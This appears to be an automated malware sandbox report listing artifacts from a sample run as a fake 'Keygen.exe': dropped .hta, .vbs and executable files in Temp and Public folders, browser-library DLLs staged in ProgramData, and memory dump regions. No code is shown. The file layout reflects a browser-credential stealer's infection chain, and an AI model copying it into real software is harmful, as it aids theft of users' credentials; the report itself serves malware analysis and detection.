            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\C40.tmp\Keygen.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\C40.tmp\Keygen.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\C40.tmp\b.hta
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\C40.tmp\b1.hta
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\C40.tmp\ba.hta
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\C40.tmp\ba1.hta
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\C40.tmp\m.hta
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\C40.tmp\m1.hta
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\C40.tmp\start.bat
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\Gsgxeo.vbs
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\Jwoasxr.vbs
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\aaa.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\aaa.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\aaa.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\ooo.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\ooo.exe
              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\ooo.exe
              Download Submit
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              Download Submit
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              Download Submit
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              Download Submit
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              Download Submit
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              Download Submit
            • C:\Users\Public\cuk.exe
              Download Submit
            • C:\Users\Public\cuk.exe
              Download Submit
            • C:\Users\Public\cuk.exe
              Download Submit
            • C:\Users\Public\ita.exe
              Download Submit
            • C:\Users\Public\ita.exe
              Download Submit
            • C:\Users\Public\ita.exe
              Download Submit
            • C:\Users\Public\jna.exe
              Download Submit
            • C:\Users\Public\jna.exe
              Download Submit
            • C:\Users\Public\jna.exe
              Download Submit
            • \ProgramData\mozglue.dll
              Download Submit
            • \ProgramData\mozglue.dll
              Download Submit
            • \ProgramData\mozglue.dll
              Download Submit
            • \ProgramData\msvcp140.dll
              Download Submit
            • \ProgramData\msvcp140.dll
              Download Submit
            • \ProgramData\msvcp140.dll
              Download Submit
            • \ProgramData\nss3.dll
              Download Submit
            • \ProgramData\nss3.dll
              Download Submit
            • \ProgramData\nss3.dll
              Download Submit
            • \ProgramData\sqlite3.dll
              Download Submit
            • \ProgramData\sqlite3.dll
              Download Submit
            • \ProgramData\sqlite3.dll
              Download Submit
            • \ProgramData\vcruntime140.dll
              Download Submit
            • \ProgramData\vcruntime140.dll
              Download Submit
            • \ProgramData\vcruntime140.dll
              Download Submit
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              Download Submit
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
              Download Submit
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
              Download Submit
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
              Download Submit
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
              Download Submit
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
              Download Submit
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
              Download Submit
            • \Users\Admin\AppData\LocalLow\sqlite3.dll
              Download Submit
            • \Users\Admin\AppData\Local\Temp\C40.tmp\Keygen.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\aaa.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\aaa.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\ooo.exe
              Download Submit
            • \Users\Admin\AppData\Local\Temp\ooo.exe
              Download Submit
            • \Users\Public\cuk.exe
              Download Submit
            • \Users\Public\ita.exe
              Download Submit
            • \Users\Public\ita.exe
              Download Submit
            • \Users\Public\jna.exe
              Download Submit
            • \Users\Public\jna.exe
              Download Submit
            • memory/788-180-0x00000000067C0000-0x00000000067C1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/788-34-0x0000000070D20000-0x000000007140E000-memory.dmp
              Filesize

              6.9MB

              Download
            • memory/788-22-0x0000000000000000-mapping.dmp
              Download
            • memory/788-83-0x0000000006530000-0x0000000006531000-memory.dmp
              Filesize

              4KB

              Download
            • memory/788-162-0x0000000006640000-0x0000000006641000-memory.dmp
              Filesize

              4KB

              Download
            • memory/788-77-0x0000000006500000-0x0000000006501000-memory.dmp
              Filesize

              4KB

              Download
            • memory/788-50-0x0000000001340000-0x0000000001341000-memory.dmp
              Filesize

              4KB

              Download
            • memory/788-70-0x0000000006360000-0x0000000006361000-memory.dmp
              Filesize

              4KB

              Download
            • memory/788-64-0x0000000006260000-0x0000000006261000-memory.dmp
              Filesize

              4KB

              Download
            • memory/788-69-0x00000000062B0000-0x00000000062B1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/788-181-0x00000000067D0000-0x00000000067D1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/812-38-0x00000000010A0000-0x00000000010A1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/812-23-0x0000000000000000-mapping.dmp
              Download
            • memory/812-35-0x0000000070D20000-0x000000007140E000-memory.dmp
              Filesize

              6.9MB

              Download
            • memory/952-206-0x0000000000400000-0x0000000000439000-memory.dmp
              Filesize

              228KB

              Download
            • memory/952-211-0x0000000000400000-0x0000000000439000-memory.dmp
              Filesize

              228KB

              Download
            • memory/952-208-0x0000000000417A8B-mapping.dmp
              Download
            • memory/964-296-0x0000000000000000-mapping.dmp
              Download
            • memory/1036-338-0x00000000026D0000-0x00000000026D1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1036-351-0x00000000026D0000-0x00000000026D1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1036-329-0x00000000026D0000-0x00000000026D1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1036-341-0x00000000026D0000-0x00000000026D1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1036-340-0x00000000026D0000-0x00000000026D1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1048-0-0x0000000000000000-mapping.dmp
              Download
            • memory/1092-29-0x0000000000000000-mapping.dmp
              Download
            • memory/1200-27-0x0000000000000000-mapping.dmp
              Download
            • memory/1380-8-0x0000000000000000-mapping.dmp
              Download
            • memory/1484-56-0x00000000054F0000-0x00000000054F1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1484-43-0x0000000004BB0000-0x0000000004BB1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1484-36-0x0000000070D20000-0x000000007140E000-memory.dmp
              Filesize

              6.9MB

              Download
            • memory/1484-30-0x0000000000000000-mapping.dmp
              Download
            • memory/1512-5-0x0000000000000000-mapping.dmp
              Download
            • memory/1512-4-0x0000000000000000-mapping.dmp
              Download
            • memory/1520-309-0x000000000041A684-mapping.dmp
              Download
            • memory/1520-307-0x0000000000400000-0x0000000000420000-memory.dmp
              Filesize

              128KB

              Download
            • memory/1520-311-0x0000000000400000-0x0000000000420000-memory.dmp
              Filesize

              128KB

              Download
            • memory/1520-194-0x0000000000000000-mapping.dmp
              Download
            • memory/1604-15-0x0000000000000000-mapping.dmp
              Download
            • memory/1608-197-0x0000000006500000-0x0000000006501000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1608-196-0x00000000064B0000-0x00000000064B1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/1608-21-0x0000000070D20000-0x000000007140E000-memory.dmp
              Filesize

              6.9MB

              Download
            • memory/1608-12-0x0000000000000000-mapping.dmp
              Download
            • memory/1628-20-0x0000000070D20000-0x000000007140E000-memory.dmp
              Filesize

              6.9MB

              Download
            • memory/1628-13-0x0000000000000000-mapping.dmp
              Download
            • memory/1692-37-0x0000000070D20000-0x000000007140E000-memory.dmp
              Filesize

              6.9MB

              Download
            • memory/1692-31-0x0000000000000000-mapping.dmp
              Download
            • memory/1828-11-0x0000000000000000-mapping.dmp
              Download
            • memory/1832-10-0x0000000000000000-mapping.dmp
              Download
            • memory/1860-17-0x0000000000000000-mapping.dmp
              Download
            • memory/1968-18-0x0000000000000000-mapping.dmp
              Download
            • memory/1976-308-0x0000000000000000-mapping.dmp
              Download
            • memory/2124-294-0x0000000000000000-mapping.dmp
              Download
            • memory/2136-239-0x000000000041A684-mapping.dmp
              Download
            • memory/2212-295-0x0000000000000000-mapping.dmp
              Download
            • memory/2224-203-0x0000000000400000-0x0000000000493000-memory.dmp
              Filesize

              588KB

              Download
            • memory/2224-198-0x0000000000400000-0x0000000000493000-memory.dmp
              Filesize

              588KB

              Download
            • memory/2224-200-0x000000000043FA93-mapping.dmp
              Download
            • memory/2392-220-0x0000000000417A8B-mapping.dmp
              Download
            • memory/2496-252-0x0000000001F10000-0x0000000001F64000-memory.dmp
              Filesize

              336KB

              Download
            • memory/2496-226-0x0000000000000000-mapping.dmp
              Download
            • memory/2496-233-0x0000000000520000-0x0000000000521000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2496-229-0x00000000000F0000-0x00000000000F1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2496-228-0x0000000070D20000-0x000000007140E000-memory.dmp
              Filesize

              6.9MB

              Download
            • memory/2504-303-0x0000000000000000-mapping.dmp
              Download
            • memory/2584-297-0x0000000000000000-mapping.dmp
              Download
            • memory/2584-112-0x0000000070D20000-0x000000007140E000-memory.dmp
              Filesize

              6.9MB

              Download
            • memory/2584-186-0x000000000A060000-0x000000000A115000-memory.dmp
              Filesize

              724KB

              Download
            • memory/2584-114-0x0000000000A60000-0x0000000000A61000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2584-106-0x0000000000000000-mapping.dmp
              Download
            • memory/2584-195-0x0000000000A30000-0x0000000000A3C000-memory.dmp
              Filesize

              48KB

              Download
            • memory/2584-122-0x00000000004B0000-0x00000000004B1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2600-110-0x0000000000000000-mapping.dmp
              Download
            • memory/2656-236-0x0000000000400000-0x0000000000425000-memory.dmp
              Filesize

              148KB

              Download
            • memory/2656-232-0x0000000000400000-0x0000000000425000-memory.dmp
              Filesize

              148KB

              Download
            • memory/2656-234-0x000000000041A684-mapping.dmp
              Download
            • memory/2680-125-0x0000000000000000-mapping.dmp
              Download
            • memory/2700-121-0x0000000000000000-mapping.dmp
              Download
            • memory/2764-133-0x0000000000000000-mapping.dmp
              Download
            • memory/2796-269-0x00000000002F0000-0x00000000002F1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2796-304-0x00000000004F0000-0x0000000000514000-memory.dmp
              Filesize

              144KB

              Download
            • memory/2796-267-0x0000000000E00000-0x0000000000E01000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2796-265-0x0000000073210000-0x00000000738FE000-memory.dmp
              Filesize

              6.9MB

              Download
            • memory/2796-263-0x0000000000000000-mapping.dmp
              Download
            • memory/2804-137-0x0000000000000000-mapping.dmp
              Download
            • memory/2820-258-0x0000000000417A8B-mapping.dmp
              Download
            • memory/2820-257-0x0000000000400000-0x0000000000434000-memory.dmp
              Filesize

              208KB

              Download
            • memory/2820-261-0x0000000000400000-0x0000000000434000-memory.dmp
              Filesize

              208KB

              Download
            • memory/2828-145-0x0000000000400000-0x0000000000498000-memory.dmp
              Filesize

              608KB

              Download
            • memory/2828-146-0x000000000043FA93-mapping.dmp
              Download
            • memory/2828-150-0x0000000000400000-0x0000000000498000-memory.dmp
              Filesize

              608KB

              Download
            • memory/2840-182-0x000007FEF6980000-0x000007FEF6BFA000-memory.dmp
              Filesize

              2.5MB

              Download
            • memory/2872-144-0x0000000000000000-mapping.dmp
              Download
            • memory/2888-266-0x00000000026E0000-0x00000000026E4000-memory.dmp
              Filesize

              16KB

              Download
            • memory/2888-253-0x0000000000000000-mapping.dmp
              Download
            • memory/2908-157-0x000000000043FA93-mapping.dmp
              Download